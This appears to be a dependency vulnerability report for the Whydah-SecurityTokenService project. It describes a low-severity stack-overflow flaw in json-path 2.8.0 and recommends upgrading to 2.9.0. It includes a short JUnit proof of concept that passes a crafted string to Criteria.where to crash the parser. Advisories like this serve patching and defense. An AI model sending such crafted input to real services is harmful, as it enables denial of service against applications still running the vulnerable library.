Vulnerabilities

 1 via 1 paths

Dependencies

 108

Source

 GitHub

Commit

 99892b1c

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

low severity

Buffer Overflow

  • Vulnerable module: com.jayway.jsonpath:json-path
  • Introduced through: net.whydah.sso:Whydah-Admin-SDK@2.22.0

Detailed paths

  • Introduced through: Cantara/Whydah-SecurityTokenService@Cantara/Whydah-SecurityTokenService#99892b1c565c337fe456c7395bcc19335ebdc172 net.whydah.sso:Whydah-Admin-SDK@2.22.0 net.whydah.sso:Whydah-Java-SDK@2.22.0 net.whydah.sso:Whydah-TypeLib@2.22.0 com.jayway.jsonpath:json-path@2.8.0

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the deprecated Criteria.parse or Criteria.where methods. An attacker can disrupt the regular operation of the application by supplying a specially crafted input that triggers a stack overflow. Exploiting this vulnerability requires insecure configurations on the server side, for example - handling requests in a one single thread.

PoC

import com.jayway.jsonpath.Criteria;
import org.junit.Test;
public class CriteriaFuzzerWhere1 {
    // Stack overflow
    @Test
    public void whereFuzzerTest() {
        try {
            Criteria result = Criteria.where("[']',");
        } catch (Exception e) {
        }
    }
}

Remediation

Upgrade com.jayway.jsonpath:json-path to version 2.9.0 or higher.

References

Buffer Overflow vulnerability report